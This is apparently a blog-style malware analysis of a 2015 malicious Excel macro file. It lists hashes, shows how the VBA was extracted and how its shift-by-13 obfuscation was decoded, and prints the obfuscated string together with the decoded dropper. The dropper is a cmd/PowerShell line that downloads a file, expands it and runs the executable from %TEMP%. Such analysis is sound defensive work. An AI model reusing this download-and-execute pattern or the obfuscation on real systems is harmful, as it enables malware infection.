General Information

This is some general info collected: [plain] Name: D92724446.xlsm MD5: fea3ab857813c0d65cd0b6b6233a834b SHA1: 64eef048efe86fe35f673fd2d853a8a727934e6c SHA256: 75e3a4cd45c08ff242e2927fa3b4ee80858073a202dade84898040bfbb7847ef ssdeep 768:qEIo/BPRS5t1dbQjlshORhynxvWXLUYJdGnSCk:qIJM8jl6nIP File size: 36.1 KB ( 36978 bytes ) File type: Office Open XML Spreadsheet Virus Total information: First submission: 2015-02-18 10:35:06 UTC Last submission: 2015-02-19 08:58:57 UTC Others names: 93D9B24583.xlsm e94fcc43b0dc9c7eb350149b4ebdfd3d 61a47fa44dd55f5721ebe85aa83a32e6 I233185_486.xlsm L335966_246.xlsm 271269885.xlsm 4501B81210.xlsm e65fb3285617c7b4bbc833a466be6c42 5312970.xlsm 9D50B4390.xlsm DDE1368393.xlsm E30178611.xlsm 43c29faad6fc5984273afcc67593d802 FE731885.xlsm C47394.xlsm suspect.xls 090214399.xlsm Q884674_740.xlsm E015272_266.xlsm U506714_083.xlsm 43925982.xlsm 82AC485705.xlsm 8abb99eb6078b658e05aece79337378a 0BF2034112.xlsm [/plain]

Static Analysis

I started my analysis having a quick look inside:

At offset 0 we can quickly view 4 bytes that confirm the format of the file (50 4B 03 04). At this point, I tried to get more information and to see how this document was composed:

This quickly confirm my first suspicions. At offset 0x000012f1 a .bin file is found. Going a little ahead, we can try to get the code of these instructions:

The code has been extracted, and different files for Classes and Modules have been created under OfficeMalScannerVBAPROJECT.BIN-Macros. Opening these files with a simple text editor, I immediately found many obfuscated instructions, as reported in the image below:

However, after a quick analysis I realized that the modules really important for extracting of the malicious code were numbers 11 and 14.

This is because the module number 11 contains the instructions for running the obfuscated code assigned to the variable named “FfdsfF” and de-obfuscated through the function call “NewQkeTzIIHM”.

“NewQkeTzIIHM” takes one parameter in input as string and returns a string. These are its main instructions:

The -13 immediately brings to mind a de-obfuscation loop which employs the rot13 algorithm. At this point, I simply wrote few lines of vbs code to correctly extract the content and print it to a txt file called output.txt. [plain] Function WriteFile(sText) Set objFSO = CreateObject(“Scripting.FileSystemObject”) Set objMyFile = objFSO.OpenTextFile( “C:UsersEOSecDesktopoutput.txt”, 8, true, 0 ) objMyFile.WriteLine(sText) objMyFile.close() End Function Dim i,x,y x = “pzq-<X-]|„ruryy;r…r-5[r„:owrp-†€rz;[r;droPyvr{6;Q|„{y|nqSvyr54u}G«B;>FC;?A@;D<x„rsr„rs<stq€rr<q…‡~;w}t4942aRZ]2iWVv|qsuv|VU;pno46H-r…}n{q-2aRZ]2iWVv|qsuv|VU;pno-2aRZ]2iWVv|qsuv|VU;r…rH-€n-2aRZ]2iWVv|qsuv|VU;r…rH” For i = 1 To Len(x) y = y + Chr(Asc(Mid(x, i, 1)) – 13) Next WriteFile(y) [/plain] This is the clear code obtained: [plain] cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile(‘’,’’); expand %TEMP%JIOiodfhioIH.exe; start %TEMP%JIOiodfhioIH.exe; [/plain] And this the whois of the remote IP: A file named dxzq.jpg is downloaded. It’s really a CAB file ( that is then expanded to JIOiodfhioIH.exe and run.